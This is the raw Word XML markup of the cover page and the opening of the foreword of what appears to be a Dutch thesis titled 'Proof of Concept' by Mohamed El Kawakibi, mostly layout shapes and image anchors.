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A699" w14:textId="1ED69D4C" w:rsidR="00027759" w:rsidRDefault="00B768BA" w:rsidP="003B2A35">
      <w:pPr>
        <w:ind w:left="-1417"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252754944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2626B094" wp14:editId="24651D8B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3219450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8305800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="950595" cy="950595"/>
            <wp:effectExtent l="2540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8" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="2065774">
                      <a:off x="0" y="0"/>
                      <a:ext cx="950595" cy="9505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3920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="051332FA" wp14:editId="40158C15">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2459355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7324090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="785495" cy="776605"/>
            <wp:effectExtent l="0" t="101600" r="0" b="137795"/>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Asset 6.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="20231583">
                      <a:off x="0" y="0"/>
                      <a:ext cx="785495" cy="7766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66208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63581E09" wp14:editId="2AAF6785">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1636395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6407785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="756285" cy="756285"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>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70304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AA2A0D3" wp14:editId="32E659CD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>752475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5490210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="825500" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>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0848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F42F6EE" wp14:editId="3C29D495">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3549015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1563370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1089660" cy="1027430"/>
            <wp:effectExtent l="50800" t="50800" r="53340" b="6477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2" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="477709">
                      <a:off x="0" y="0"/>
                      <a:ext cx="1089660" cy="1027430"/>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72352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4804AD19" wp14:editId="48955A2F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1191260</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3830955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="808990" cy="668655"/>
            <wp:effectExtent l="101600" t="127000" r="105410" b="144145"/>
            <wp:wrapSquare wrapText="bothSides"/>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3" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="1212047">
                      <a:off x="0" y="0"/>
                      <a:ext cx="808990" cy="668655"/>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62112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B3C149D" wp14:editId="2A5D2A34">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2393950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2700655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="908050" cy="800735"/>
            <wp:effectExtent l="76200" t="76200" r="57150" b="8826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rot="21028071">
                      <a:off x="0" y="0"/>
                      <a:ext cx="908050" cy="800735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CF6C78">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252755968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F421831" wp14:editId="640E4BBB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4256405</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>9618980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="810895" cy="571500"/>
            <wp:effectExtent l="101600" t="152400" r="103505" b="139700"/>
            <wp:wrapSquare wrapText="bothSides"/>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5" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="1371966">
                      <a:off x="0" y="0"/>
                      <a:ext cx="810895" cy="571500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E031DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252343296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C7C0E03" wp14:editId="5059C781">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-831215</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>119380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3556635" cy="631190"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3556635" cy="631190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00EE6B45">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252301312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62D9D409" wp14:editId="6ECA5F3A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-914547</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1592384</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9557385" cy="2354580"/>
                <wp:effectExtent l="0" t="2870200" r="0" b="2877820"/>
                <wp:wrapNone/>
                <wp:docPr id="128" name="Parallelogram 128"/>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AAA0D"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 o:spid="_x0000_s1026" type="#_x0000_t7" style="position:absolute;margin-left:-1in;margin-top:125.4pt;width:752.55pt;height:185.4pt;rotation:9108534fd;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" adj="0" fillcolor="#ffc000" strokecolor="#ffc000" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009633DF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252320768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3464A3F2" wp14:editId="64E09DA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-391795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9145905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2418080" cy="56769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41808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BF2FC" w14:textId="68609E9A" w:rsidR="002A05E5" w:rsidRPr="00B9198F" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B9198F">
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Mohamed El Kawa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4A3F2" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 170" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-30.85pt;margin-top:720.15pt;width:190.4pt;height:44.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="512BF2FC" w14:textId="68609E9A" w:rsidR="002A05E5" w:rsidRPr="00B9198F" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B9198F">
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Mohamed El Kawakibi</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299264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D5AC41E" wp14:editId="629587ED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3166761</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4688382</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3493770" cy="125666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49377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B47B8" w14:textId="4BA8C79F" w:rsidR="002A05E5" w:rsidRPr="00B9198F" w:rsidRDefault="002A05E5" w:rsidP="00CA30BD">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B9198F">
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>Proof of Concept</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2478DC51" w14:textId="40F92C54" w:rsidR="002A05E5" w:rsidRPr="00B9198F" w:rsidRDefault="002A05E5"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41E" id="Text Box 235" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:249.35pt;margin-top:369.15pt;width:275.1pt;height:98.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="484B47B8" w14:textId="4BA8C79F" w:rsidR="002A05E5" w:rsidRPr="00B9198F" w:rsidRDefault="002A05E5" w:rsidP="00CA30BD">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B9198F">
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>Proof of Concept</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2478DC51" w14:textId="40F92C54" w:rsidR="002A05E5" w:rsidRPr="00B9198F" w:rsidRDefault="002A05E5"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307456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E77DA02" wp14:editId="4BF467F1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>930474</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7367477</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7183755" cy="909872"/>
                <wp:effectExtent l="2146618" t="0" r="2151062" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="142" name="Parallelogram 142"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="2962021">
                          <a:off x="0" y="0"/>
                          <a:ext cx="7183755" cy="909872"/>
                        </a:xfrm>
                        <a:prstGeom prst="parallelogram">
                          <a:avLst>
                            <a:gd name="adj" fmla="val 0"/>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2692" id="Parallelogram 142" o:spid="_x0000_s1026" type="#_x0000_t7" style="position:absolute;margin-left:73.25pt;margin-top:580.1pt;width:565.65pt;height:71.65pt;rotation:3235317fd;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" adj="0" fillcolor="#ffd63c" strokecolor="#ffd63c" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009633DF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694077" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12FE5142" wp14:editId="7D4EE220">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3722370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2339340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2773045" cy="1856740"/>
                <wp:effectExtent l="25400" t="203200" r="0" b="200660"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="21213" y="-501"/>
                    <wp:lineTo x="8454" y="-2912"/>
                    <wp:lineTo x="8057" y="1778"/>
                    <wp:lineTo x="4524" y="1111"/>
                    <wp:lineTo x="4126" y="5801"/>
                    <wp:lineTo x="397" y="5096"/>
                    <wp:lineTo x="-197" y="9749"/>
                    <wp:lineTo x="-594" y="14440"/>
                    <wp:lineTo x="-405" y="21624"/>
                    <wp:lineTo x="380" y="21772"/>
                    <wp:lineTo x="18656" y="3781"/>
                    <wp:lineTo x="21777" y="-97"/>
                    <wp:lineTo x="21802" y="-390"/>
                    <wp:lineTo x="21213" y="-501"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="143" name="Diagonal Stripe 143"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="21167304">
                          <a:off x="0" y="0"/>
                          <a:ext cx="2773045" cy="1856740"/>
                        </a:xfrm>
                        <a:prstGeom prst="diagStripe">
                          <a:avLst>
                            <a:gd name="adj" fmla="val 50451"/>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8B86" id="Diagonal Stripe 143" o:spid="_x0000_s1026" style="position:absolute;margin-left:293.1pt;margin-top:184.2pt;width:218.35pt;height:146.2pt;rotation:-472619fd;z-index:251694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045,1856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" path="m0,936744l1399029,,2773045,,,1856740,,936744xe" fillcolor="#ffd63c" strokecolor="#ffd63c" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,936744;1399029,0;2773045,0;0,1856740;0,936744" o:connectangles="0,0,0,0,0"/>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009633DF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252308480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52EFC5FA" wp14:editId="67683331">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1588784</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4152481</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2997885" cy="760028"/>
                <wp:effectExtent l="0" t="939800" r="0" b="916940"/>
                <wp:wrapNone/>
                <wp:docPr id="140" name="Rectangle 140"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="19114893">
                          <a:off x="0" y="0"/>
                          <a:ext cx="2997885" cy="760028"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">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313E3" id="Rectangle 140" o:spid="_x0000_s1026" style="position:absolute;margin-left:125.1pt;margin-top:326.95pt;width:236.05pt;height:59.85pt;rotation:-2714400fd;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" fillcolor="#ffd63c" strokecolor="#ffd63c" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006A4404">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696127" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78A0980F" wp14:editId="58C66B88">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-990106</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>677333</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9557385" cy="2354580"/>
                <wp:effectExtent l="0" t="2870200" r="0" b="2877820"/>
                <wp:wrapNone/>
                <wp:docPr id="137" name="Parallelogram 137"/>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chemeClr val="accent4">
                            <a:lumMod val="40000"/>
                            <a:lumOff val="60000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFE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FA76" id="Parallelogram 137" o:spid="_x0000_s1026" type="#_x0000_t7" style="position:absolute;margin-left:-77.95pt;margin-top:53.35pt;width:752.55pt;height:185.4pt;rotation:9108534fd;z-index:-25162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" adj="0" fillcolor="#ffe599 [1303]" strokecolor="#ffe699" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006A4404">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252303360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="109086F8" wp14:editId="6F340E8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-1319634</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6639018</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9539477" cy="2471122"/>
                <wp:effectExtent l="2848292" t="0" r="2834323" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="135" name="Parallelogram 135"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="2962021">
                          <a:off x="0" y="0"/>
                          <a:ext cx="9539477" cy="2471122"/>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8956" id="Parallelogram 135" o:spid="_x0000_s1026" type="#_x0000_t7" style="position:absolute;margin-left:-103.9pt;margin-top:522.75pt;width:751.15pt;height:194.6pt;rotation:3235317fd;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" adj="0" fillcolor="#ffc000" strokecolor="#ffc000" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00027759">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B786569" w14:textId="19CDF6E4" w:rsidR="00594BF5" w:rsidRDefault="00CA3CAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253327360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30624BE6" wp14:editId="31AA139B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-714645</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="915" name="Rectangle 91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8F803" id="Rectangle 915" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.6pt;margin-top:-56.2pt;width:25pt;height:1031.7pt;z-index:-2499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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="70054A69" w14:textId="6C30738E" w:rsidR="00594BF5" w:rsidRDefault="00594BF5" w:rsidP="00594BF5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Voorwoord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841A4D7" w14:textId="53538394" w:rsidR="00594BF5" w:rsidRDefault="00B12579" w:rsidP="00E86E02">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253185024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="721107D6" wp14:editId="724AF5EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-71755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2707640</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5650865" cy="459740"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="782" name="Text Box 782"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="565086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86B730" w14:textId="0C81F69D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Ik wens de lezers van mijn scriptie veel leesplezier en ik hoop dat jullie er wat van kunnen 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07D6" id="Text Box 782" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.65pt;margin-top:213.2pt;width:444.95pt;height:36.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0086B730" w14:textId="0C81F69D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Ik wens de lezers van mijn scriptie veel leesplezier en ik hoop dat jullie er wat van kunnen leren.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253184000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12333A6A" wp14:editId="2CC254BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-73660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
